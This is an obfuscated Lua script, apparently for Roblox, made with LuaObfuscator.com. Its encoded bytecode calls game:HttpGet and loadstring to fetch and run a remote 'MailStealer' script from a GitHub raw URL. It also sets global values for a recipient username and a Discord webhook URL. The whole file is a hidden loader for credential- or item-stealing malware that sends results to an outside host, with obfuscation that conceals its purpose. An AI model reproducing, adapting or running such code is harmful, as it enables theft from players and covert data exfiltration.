--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=(927 -(214 + 713)) -(0 + 0) ;local v32;while true do if (v31==(620 -(88 + 467 + 64))) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (932 -(857 + 74)) ;v31=1 -0 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (879 -(282 + 595)) );v19=v19 + (1639 -(1523 + 114)) ;return (v34 * (231 + 25)) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1 -0 ;local v38=(v21(v36,1066 -(68 + (2684 -1687)) ,1290 -(226 + (1893 -849)) ) * ((8 -6)^(149 -(32 + 62 + 23)))) + v35 ;local v39=v21(v36,21 + (997 -(915 + 82)) ,7 + (67 -43) );local v40=((v21(v36,989 -(892 + 65) )==((2 + 0) -(1 -0))) and  -(1 -0)) or 1 ;if (v39==(0 -0)) then if (v38==(350 -(87 + (1450 -(1069 + 118))))) then return v40 * 0 ;else local v90=180 -(67 + 113) ;while true do if (v90==0) then v39=2 -1 ;v37=0 + 0 ;break;end end end elseif (v39==2047) then return ((v38==(0 -0)) and (v40 * (1/0))) or (v40 * NaN) ;end return v8(v40,v39-(753 + 270) ) * (v37 + (v38/((7 -5)^(1004 -(802 + 150))))) ;end v26=nil;function v26(v41)local v42=0 -0 ;local v43;local v44;while true do if (v42==(1 + 2)) then return v6(v44);end if (2==v42) then v44={};for v91=1 -0 , #v43 do v44[v91]=v2(v1(v3(v43,v91,v91)));end v42=(9 -6) + 0 ;end if (v42==1) then v43=v3(v16,v19,(v19 + v41) -1 );v19=v19 + v41 ;v42=793 -(368 + 423) ;end if (v42==(0 -0)) then v43=nil;if  not v41 then local v97=0;while true do if (v97==((8 + 10) -(10 + 8))) then v41=v24();if (v41==(0 -0)) then return "";end break;end end end v42=443 -(416 + 26) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=1707 -(856 + 851) ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==1) then v48=nil;v49=nil;v45=1765 -(454 + 1309) ;end if (v45==0) then v46=0;v47=nil;v45=1;end if (v45~=2) then else v50=nil;v51=nil;v45=3;end if (v45~=(2 + 2)) then else while true do if (0==v46) then local v98=0;while true do if ((0 -0)==v98) then v47=0;v48=nil;v98=1;end if ((1 -0)~=v98) then else v46=1;break;end end end if (v46~=2) then else local v99=0 -0 ;while true do if (v99==0) then v51=nil;v52=nil;v99=286 -(134 + 151) ;end if (v99==(1666 -(970 + 695))) then v46=3;break;end end end if (v46~=1) then else v49=nil;v50=nil;v46=2;end if (v46==3) then v53=nil;while true do local v100=0 -0 ;while true do if (1==v100) then if (v47~=0) then else v48={};v49={};v50={};v51={v48,v49,nil,v50};v47=1;end break;end if (v100==(0 -0)) then if (v47==1) then v52=v24();v53={};for v142=1 -0 ,v52 do local v143=0;local v144;local v145;local v146;while true do if (v143~=1) then else v146=nil;while true do if (v144==(3 -2)) then if (v145==(1825 -(1195 + 629))) then v146=v22()~=(0 -0) ;elseif (v145==(243 -(187 + 54))) then v146=v25();elseif (v145~=3) then else v146=v26();end v53[v142]=v146;break;end if (v144~=0) then else local v161=0;while true do if (v161~=0) then else local v168=0;while true do if (v168==1) then v161=1;break;end if (v168~=(780 -(162 + 618))) then else v145=v22();v146=nil;v168=1 + 0 ;end end end if ((1 + 0)==v161) then v144=1 -0 ;break;end end end end break;end if (v143~=0) then else local v158=0;while true do if (v158~=(0 -0)) then else v144=0 + 0 ;v145=nil;v158=1637 -(1373 + 263) ;end if (v158~=(1001 -(451 + 549))) then else v143=1 + 0 ;break;end end end end end v51[4 -1 ]=v22();v47=2 -0 ;end if (v47~=2) then else for v147=1385 -(746 + 638) ,v24() do local v148=0;local v149;local v150;while true do if (v148==0) then local v159=0;while true do if (v159~=(1 + 0)) then else v148=1 -0 ;break;end if (v159==0) then v149=0;v150=nil;v159=1;end end end if ((342 -(218 + 123))==v148) then while true do if (v149~=(1581 -(1535 + 46))) then else v150=v22();if (v21(v150,1 + 0 ,1 + 0 )~=(560 -(306 + 254))) then else local v162=0 + 0 ;local v163;local v164;local v165;local v166;local v167;while true do if (v162~=2) then else v167=nil;while true do if (v163==(0 -0)) then local v170=1467 -(899 + 568) ;local v171;while true do if (v170==0) then v171=0;while true do if (v171~=(0 + 0)) then else v164=0;v165=nil;v171=1;end if ((2 -1)~=v171) then else v163=1;break;end end break;end end end if (v163==2) then while true do if (v164==(606 -(268 + 335))) then if (v21(v166,293 -(60 + 230) ,575 -(426 + 146) )~=1) then else v167[1 + 3 ]=v53[v167[4]];end v48[v147]=v167;break;end if (v164~=1) then else local v173=0;local v174;local v175;while true do if (v173==0) then v174=1456 -(282 + 1174) ;v175=nil;v173=812 -(569 + 242) ;end if (v173~=(2 -1)) then else while true do if (v174==(0 + 0)) then v175=1024 -(706 + 318) ;while true do if (v175==1) then v164=1253 -(721 + 530) ;break;end if (v175~=(1271 -(945 + 326))) then else local v184=0 -0 ;while true do if (v184==0) then v167={v23(),v23(),nil,nil};if (v165==(0 + 0)) then local v188=1500 -(1408 + 92) ;local v189;while true do if (v188~=0) then else v189=1086 -(461 + 625) ;while true do if (v189~=(1288 -(993 + 295))) then else v167[1 + 2 ]=v23();v167[1175 -(418 + 753) ]=v23();break;end end break;end end elseif (v165==(1 + 0)) then v167[3]=v24();elseif (v165==(1 + 1)) then v167[3]=v24() -(2^16) ;elseif (v165~=(1 + 2)) then else local v199=0;local v200;local v201;local v202;while true do if (v199==(1 + 0)) then v202=nil;while true do if (v200==0) then local v203=0;while true do if (v203~=0) then else v201=529 -(406 + 123) ;v202=nil;v203=1770 -(1749 + 20) ;end if (v203~=(1 + 0)) then else v200=1323 -(1249 + 73) ;break;end end end if (v200~=1) then else while true do if (v201~=0) then else v202=0 + 0 ;while true do if ((1145 -(466 + 679))==v202) then v167[6 -3 ]=v24() -((5 -3)^(1916 -(106 + 1794))) ;v167[2 + 2 ]=v23();break;end end break;end end break;end end break;end if (v199==(0 + 0)) then v200=0;v201=nil;v199=2 -1 ;end end end v184=1;end if (v184==1) then v175=2 -1 ;break;end end end end break;end end break;end end end if (v164~=0) then else local v176=0;local v177;local v178;while true do if ((115 -(4 + 110))==v176) then while true do if (v177==(584 -(57 + 527))) then v178=0;while true do if (v178==0) then local v185=1427 -(41 + 1386) ;local v186;while true do if (v185==(103 -(17 + 86))) then v186=0 + 0 ;while true do if (v186==(1 -0)) then v178=1;break;end if ((0 -0)==v186) then local v194=0;while true do if (v194~=1) then else v186=167 -(122 + 44) ;break;end if (v194==(0 -0)) then v165=v21(v150,6 -4 ,3 + 0 );v166=v21(v150,4,1 + 5 );v194=1 -0 ;end end end end break;end end end if (v178==1) then v164=66 -(30 + 35) ;break;end end break;end end break;end if (v176==0) then v177=0;v178=nil;v176=1 + 0 ;end end end if (v164==(1259 -(1043 + 214))) then local v179=0;while true do if (v179~=(0 -0)) then else local v182=0;local v183;while true do if ((1212 -(323 + 889))~=v182) then else v183=0 -0 ;while true do if (v183==0) then local v187=580 -(361 + 219) ;while true do if (v187~=(320 -(53 + 267))) then else if (v21(v166,1,1)==1) then v167[2]=v53[v167[1 + 1 ]];end if (v21(v166,415 -(15 + 398) ,984 -(18 + 964) )~=(3 -2)) then else v167[2 + 1 ]=v53[v167[2 + 1 ]];end v187=1;end if (v187~=1) then else v183=851 -(20 + 830) ;break;end end end if (v183==(1 + 0)) then v179=127 -(116 + 10) ;break;end end break;end end end if (1==v179) then v164=1 + 2 ;break;end end end end break;end if (v163~=1) then else v166=nil;v167=nil;v163=740 -(542 + 196) ;end end break;end if (v162==(1 -0)) then v165=nil;v166=nil;v162=2;end if (v162==(0 + 0)) then local v169=0;while true do if (v169==(0 + 0)) then v163=0 + 0 ;v164=nil;v169=2 -1 ;end if (v169==1) then v162=1;break;end end end end end break;end end break;end end end for v151=2 -1 ,v24() do v49[v151-1 ]=v29();end return v51;end v100=1552 -(1126 + 425) ;end end end break;end end break;end if (v45==(408 -(118 + 287))) then v52=nil;v53=nil;v45=15 -11 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v54,16));if v20 then local v101=v5(v83,v20);v20=nil;return v101;else return v83;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (1124 -(26 + 92 + 1003)) );v19=v19 + (11 -7) ;return (v58 * (16778193 -(553 + 424))) + (v57 * (65913 -(142 + 235))) + (v56 * (1161 -905)) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v84=0,v76 do if (v84>=v70) then v74[v84-v70 ]=v75[v84 + 1 ];else v78[v84]=v75[v84 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81>0) then do return;end else v78[v80[2]]=v61[v80[3]];end elseif (v81<=2) then local v104=v80[2];v78[v104]=v78[v104](v13(v78,v104 + 1 ,v73));elseif (v81==3) then local v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));else v78[v80[2]]=v80[3];end elseif (v81<=6) then if (v81>5) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=7) then v72=v80[3];elseif (v81==8) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=14) then if (v81<=11) then if (v81>10) then v78[v80[2]]();else local v109=v80[2];local v110=v78[v80[3]];v78[v109 + 1 ]=v110;v78[v109]=v110[v80[4]];end elseif (v81<=12) then local v114=v80[2];local v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v73=(v116 + v114) -1 ;local v117=0;for v125=v114,v73 do v117=v117 + 1 ;v78[v125]=v115[v117];end elseif (v81==13) then v78[v80[2]][v80[3]]=v80[4];else v72=v80[3];end elseif (v81<=16) then if (v81==15) then local v118=v80[2];local v119=v78[v80[3]];v78[v118 + 1 ]=v119;v78[v118]=v119[v80[4]];else do return;end end elseif (v81<=17) then v78[v80[2]]=v61[v80[3]];elseif (v81==18) then v78[v80[2]][v80[3]]=v80[4];else local v138=v80[2];local v139,v140=v71(v78[v138](v13(v78,v138 + 1 ,v80[3])));v73=(v140 + v138) -1 ;local v141=0;for v153=v138,v73 do v141=v141 + 1 ;v78[v153]=v139[v141];end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v65/((2 + 0)^(v66-(1 + 0))))%((2 + 0)^(((v67-(754 -((1441 -(373 + 829)) + 514))) -(v66-((732 -(476 + 255)) + 0))) + 1 + 0)) ;return v88-(v88%(1 + 0)) ;end end else local v89=(2 + (1130 -(369 + 761)))^(v66-(2 -1)) ;return (((v65%(v89 + v89))>=v89) and (2 -1)) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703093O00557365724E616D657903093O00706170656E6F2O313703083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130322O38323934352O343O3833343135302F664F4C4E674C4A6C6D3239526D634E4F413070634E464775536B78313577454A4553723263714D2D554F385877636652373077614F684F6C33556848773674354337524600143O0012053O00013O0026083O000B000100020004073O000B000100122O000100033O00122O000200043O00200A000200020005001205000400064O0013000200044O000200013O00022O00060001000100010004073O001300010026083O0001000100010004073O0001000100122O000100073O00300D00010008000900122O000100073O00300D0001000A000B0012053O00023O0004073O000100012O00013O00017O00",v9(),...);end
